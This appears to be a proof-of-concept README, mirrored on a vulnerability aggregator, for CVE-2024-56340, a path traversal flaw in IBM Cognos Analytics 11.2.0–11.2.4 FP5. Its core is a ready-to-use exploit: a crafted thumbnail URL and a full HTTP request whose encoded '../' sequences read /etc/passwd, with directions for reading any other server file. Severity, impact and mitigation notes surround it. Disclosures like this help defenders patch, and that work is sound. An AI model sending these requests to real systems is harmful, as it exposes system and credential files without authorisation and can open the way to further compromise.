来源

关联漏洞

描述

IBM Cognos Analytics Path Traversal,  Poc of CVE-2024-56340

介绍

# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` 

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## Poc
Afer logging into IBM Cognos Analytics, if the user has such grants to reach the following url, it is possible tor read files stored serverside using path traversal payloads, in this case unix payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Embed this url customizing it with the vulnerable **domain** to read /etc/passwd or replace the %fetc%2fpasswd with the file to read with / url-encoded:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read traversing the files, appending the files to search with path url-encoded in place of %2fetc%2fpasswd ``

## Affected Version Details :

 - $\le$ 11.2.4 $\geq$ 11.2.0

## Impact :

The attacker can read files stored serverside, where the tool have been installed. This can be a vector to perform RCE if some conditions are verified on the victim machine.
## Mitigation :

-  Update to version > 11.2.4
  
## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340

文件快照

 [4.0K]  /data/pocs/54eef242e97271e7fb8924654a393542758511d3
└── [2.1K]  README.md

0 directories, 1 file

备注